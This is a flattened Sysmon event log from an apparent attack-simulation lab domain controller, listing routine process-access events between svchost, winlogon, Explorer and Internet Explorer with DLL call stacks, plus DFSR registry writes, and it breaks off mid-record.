13:59:29.537{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.459{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.443{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.959{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.943{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.943{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.928{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 13241300x800000000000000013771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000013770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x800000000000000013769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:30.912{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x800000000000000013768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 